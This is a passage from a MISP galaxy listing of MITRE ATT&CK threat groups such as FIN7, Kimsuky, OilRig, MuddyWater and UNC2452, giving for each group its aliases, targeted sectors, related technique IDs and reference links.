https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

https://www.justice.gov/opa/page/file/1122671/download

https://www.justice.gov/opa/pr/two-chinese-hackers-associated-ministry-state-security-charged-global-computer-intrusion

https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

Sowbug - G0054

[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Sowbug - G0054"

Sowbug - G0054 is also known as:

  • Sowbug

Sowbug - G0054 has relationships with:

  • similar: misp-galaxy:threat-actor="Sowbug" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7117. Table References

Links

https://attack.mitre.org/groups/G0054

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

FIN7 - G0046

[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013. [FIN7](https://attack.mitre.org/groups/G0046) has primarily targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities industries in the U.S. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, [FIN7](https://attack.mitre.org/groups/G0046) has shifted operations to a big game hunting (BGH) approach, including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. FIN7 may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appear to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware, which are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)

The tag is: misp-galaxy:mitre-intrusion-set="FIN7 - G0046"

FIN7 - G0046 is also known as:

  • FIN7

  • GOLD NIAGARA

  • ITG14

  • Carbon Spider

FIN7 - G0046 has relationships with:

  • similar: misp-galaxy:threat-actor="FIN7" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Carbanak - G0008" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7118. Table References

Links

http://blog.morphisec.com/fin7-attacks-restaurant-industry

https://attack.mitre.org/groups/G0046

https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/

https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

https://www.mandiant.com/resources/evolution-of-fin7

https://www.secureworks.com/research/threat-profiles/gold-niagara

Gallmaker - G0084

[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Gallmaker - G0084"

Gallmaker - G0084 is also known as:

  • Gallmaker

Table 7119. Table References

Links

https://attack.mitre.org/groups/G0084

https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group

RTM - G0048

[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). (Citation: ESET RTM Feb 2017)

The tag is: misp-galaxy:mitre-intrusion-set="RTM - G0048"

RTM - G0048 is also known as:

  • RTM

RTM - G0048 has relationships with:

  • uses: misp-galaxy:mitre-malware="RTM - S0148" with estimative-language:likelihood-probability="almost-certain"

Table 7120. Table References

Links

https://attack.mitre.org/groups/G0048

https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf

Kimsuky - G0094

[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)

[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:mitre-intrusion-set="Kimsuky - G0094"

Kimsuky - G0094 is also known as:

  • Kimsuky

  • STOLEN PENCIL

  • Thallium

  • Black Banshee

  • Velvet Chollima

Table 7121. Table References

Links

https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

https://attack.mitre.org/groups/G0094

https://blog.alyac.co.kr/2234

https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf

https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/

https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf

https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/

https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/

OilRig - G0049

[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)

The tag is: misp-galaxy:mitre-intrusion-set="OilRig - G0049"

OilRig - G0049 is also known as:

  • OilRig

  • COBALT GYPSY

  • IRN2

  • APT34

  • Helix Kitten

  • Evasive Serpens

OilRig - G0049 has relationships with:

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7122. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/

http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/

http://www.clearskysec.com/oilrig/

https://attack.mitre.org/groups/G0049

https://pan-unit42.github.io/playbook_viewer/

https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens

https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/

https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

NEODYMIUM - G0055

[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)

The tag is: misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055"

NEODYMIUM - G0055 is also known as:

  • NEODYMIUM

NEODYMIUM - G0055 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="NEODYMIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="NEODYMIUM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Wingbird - S0176" with estimative-language:likelihood-probability="almost-certain"

Table 7123. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

https://attack.mitre.org/groups/G0055

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/

PROMETHIUM - G0056

[PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics.(Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)(Citation: Talos Promethium June 2020)

The tag is: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056"

PROMETHIUM - G0056 is also known as:

  • PROMETHIUM

  • StrongPity

PROMETHIUM - G0056 has relationships with:

  • similar: misp-galaxy:threat-actor="PROMETHIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="PROMETHIUM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Truvasys - S0178" with estimative-language:likelihood-probability="almost-certain"

Table 7124. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

https://attack.mitre.org/groups/G0056

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

Leviathan - G0065

[Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security’s (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Leviathan - G0065"

Leviathan - G0065 is also known as:

  • Leviathan

  • MUDCARP

  • Kryptonite Panda

  • Gadolinium

  • BRONZE MOHAWK

  • TEMP.Jumper

  • APT40

  • TEMP.Periscope

Leviathan - G0065 has relationships with:

  • similar: misp-galaxy:threat-actor="APT40" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"

Table 7125. Table References

Links

https://attack.mitre.org/groups/G0065

https://us-cert.cisa.gov/ncas/alerts/aa21-200a

https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies

https://www.crowdstrike.com/blog/two-birds-one-stone-panda/

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

Rancor - G0075

[Rancor](https://attack.mitre.org/groups/G0075) is a threat group that has led targeted campaigns against the South East Asia region. [Rancor](https://attack.mitre.org/groups/G0075) uses politically-motivated lures to entice victims to open malicious documents. (Citation: Rancor Unit42 June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Rancor - G0075"

Rancor - G0075 is also known as:

  • Rancor

Table 7126. Table References

Links

https://attack.mitre.org/groups/G0075

https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

Machete - G0095

[Machete](https://attack.mitre.org/groups/G0095) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://attack.mitre.org/groups/G0095) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Machete - G0095"

Machete - G0095 is also known as:

  • Machete

  • APT-C-43

  • El Machete

Machete - G0095 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Machete - APT-C-43" with estimative-language:likelihood-probability="likely"

Table 7127. Table References

Links

https://attack.mitre.org/groups/G0095

https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

https://securelist.com/el-machete/66108/

https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html

https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf

Elderwood - G0066

[Elderwood](https://attack.mitre.org/groups/G0066) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. (Citation: Security Affairs Elderwood Sept 2012) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)

The tag is: misp-galaxy:mitre-intrusion-set="Elderwood - G0066"

Elderwood - G0066 is also known as:

  • Elderwood

  • Elderwood Gang

  • Beijing Group

  • Sneaky Panda

Elderwood - G0066 has relationships with:

  • similar: misp-galaxy:threat-actor="Beijing Group" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 7128. Table References

Links

http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html

https://attack.mitre.org/groups/G0066

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.csmonitor.com/USA/2012/0914/Stealing-US-business-secrets-Experts-ID-two-huge-cyber-gangs-in-China

Thrip - G0076

[Thrip](https://attack.mitre.org/groups/G0076) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. (Citation: Symantec Thrip June 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Thrip - G0076"

Thrip - G0076 is also known as:

  • Thrip

Table 7129. Table References

Links

https://attack.mitre.org/groups/G0076

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

PLATINUM - G0068

[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068"

PLATINUM - G0068 is also known as:

  • PLATINUM

PLATINUM - G0068 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="PLATINUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="PLATINUM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7130. Table References

Links

https://attack.mitre.org/groups/G0068

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

MuddyWater - G0069

[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran’s Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)

The tag is: misp-galaxy:mitre-intrusion-set="MuddyWater - G0069"

MuddyWater - G0069 is also known as:

  • MuddyWater

  • Earth Vetala

  • MERCURY

  • Static Kitten

  • Seedworm

  • TEMP.Zagros

MuddyWater - G0069 has relationships with:

  • similar: misp-galaxy:threat-actor="MuddyWater" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Mshta - T1170" with estimative-language:likelihood-probability="almost-certain"

Table 7131. Table References

Links

https://attack.mitre.org/groups/G0069

https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html

https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/

https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf

https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/

https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html

Leafminer - G0077

[Leafminer](https://attack.mitre.org/groups/G0077) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. (Citation: Symantec Leafminer July 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Leafminer - G0077"

Leafminer - G0077 is also known as:

  • Leafminer

  • Raspite

Table 7132. Table References

Links

https://attack.mitre.org/groups/G0077

https://www.dragos.com/blog/20180802Raspite.html

https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east

DarkHydrus - G0079

[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. (Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)

The tag is: misp-galaxy:mitre-intrusion-set="DarkHydrus - G0079"

DarkHydrus - G0079 is also known as:

  • DarkHydrus

Table 7133. Table References

Links

https://attack.mitre.org/groups/G0079

https://pan-unit42.github.io/playbook_viewer/

https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

BlackTech - G0098

[BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia (particularly Taiwan, Japan, and Hong Kong) and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)

The tag is: misp-galaxy:mitre-intrusion-set="BlackTech - G0098"

BlackTech - G0098 is also known as:

  • BlackTech

  • Palmerworm

Table 7134. Table References

Links

https://attack.mitre.org/groups/G0098

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt

https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape

https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK

TA2541 - G1018

[TA2541](https://attack.mitre.org/groups/G1018) is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. [TA2541](https://attack.mitre.org/groups/G1018) campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)

The tag is: misp-galaxy:mitre-intrusion-set="TA2541 - G1018"

TA2541 - G1018 is also known as:

  • TA2541

Table 7135. Table References

Links

https://attack.mitre.org/groups/G1018

https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/

https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight

FIN13 - G1016

[FIN13](https://attack.mitre.org/groups/G1016) is a financially motivated cyber threat group that has targeted the financial, retail, and hospitality industries in Mexico and Latin America, as early as 2016. [FIN13](https://attack.mitre.org/groups/G1016) achieves its objectives by stealing intellectual property, financial data, mergers and acquisition information, or PII.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)

The tag is: misp-galaxy:mitre-intrusion-set="FIN13 - G1016"

FIN13 - G1016 is also known as:

  • FIN13

  • Elephant Beetle

Table 7136. Table References

Links

https://attack.mitre.org/groups/G1016

https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&hssc=147695848.1.1680005306711&hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d

https://www.mandiant.com/resources/blog/fin13-cybercriminal-mexico

UNC2452 - G0118

[UNC2452](https://attack.mitre.org/groups/G0118) is a suspected Russian state-sponsored threat group responsible for the 2020 SolarWinds software supply chain intrusion.(Citation: FireEye SUNBURST Backdoor December 2020) Victims of this campaign include government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East.(Citation: FireEye SUNBURST Backdoor December 2020) The group also compromised at least one think tank by late 2019.(Citation: Volexity SolarWinds)

The tag is: misp-galaxy:mitre-intrusion-set="UNC2452 - G0118"

UNC2452 - G0118 is also known as:

  • UNC2452

  • NOBELIUM

  • StellarParticle

  • Dark Halo

Table 7137. Table References

Links

https://attack.mitre.org/groups/G0118

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

TA551 - G0127

[TA551](https://attack.mitre.org/groups/G0127) is a financially-motivated threat group that has been active since at least 2018. (Citation: Secureworks GOLD CABIN) The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. (Citation: Unit 42 TA551 Jan 2021)

The tag is: misp-galaxy:mitre-intrusion-set="TA551 - G0127"

TA551 - G0127 is also known as:

  • TA551

  • GOLD CABIN

  • Shathak

Table 7138. Table References

Links

https://attack.mitre.org/groups/G0127

https://unit42.paloaltonetworks.com/ta551-shathak-icedid/

https://unit42.paloaltonetworks.com/valak-evolution/

https://www.secureworks.com/research/threat-profiles/gold-cabin

CURIUM - G1012

[CURIUM](https://attack.mitre.org/groups/G1012) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://attack.mitre.org/groups/G1012) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.(Citation: Microsoft Iranian Threat Actor Trends November 2021)

The tag is: misp-galaxy:mitre-intrusion-set="CURIUM - G1012"

CURIUM - G1012 is also known as:

  • CURIUM

Table 7139. Table References

Links

https://attack.mitre.org/groups/G1012

https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021

Sidewinder - G0121

[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.(Citation: ATT Sidewinder January 2021)(Citation: Securelist APT Trends April 2018)(Citation: Cyble Sidewinder September 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Sidewinder - G0121"

Sidewinder - G0121 is also known as:

  • Sidewinder

  • T-APT-04

  • Rattlesnake

Sidewinder - G0121 has relationships with:

  • similar: misp-galaxy:360net-threat-actor="响尾蛇 - APT-C-24" with estimative-language:likelihood-probability="likely"

Table 7140. Table References

Links

https://attack.mitre.org/groups/G0121

https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/

https://securelist.com/apt-trends-report-q1-2018/85280/

Windshift - G0112

[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Windshift - G0112"

Windshift - G0112 is also known as:

  • Windshift

  • Bahamut

Table 7141. Table References

Links

https://attack.mitre.org/groups/G0112

https://objective-see.com/blog/blog_0x3B.html

https://objective-see.com/blog/blog_0x3D.html

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf

Metador - G1013

[Metador](https://attack.mitre.org/groups/G1013) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://attack.mitre.org/groups/G1013) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://attack.mitre.org/groups/G1013) based on the "I am meta" string in one of the group’s malware samples and the expectation of Spanish-language responses from C2 servers.(Citation: SentinelLabs Metador Sept 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Metador - G1013"

Metador - G1013 is also known as:

  • Metador

Table 7142. Table References

Links

https://assets.sentinelone.com/sentinellabs22/metador#page=1

https://attack.mitre.org/groups/G1013

Chimera - G0114

[Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Chimera - G0114"

Chimera - G0114 is also known as:

  • Chimera

Table 7143. Table References

Links

https://attack.mitre.org/groups/G0114

https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf

https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/

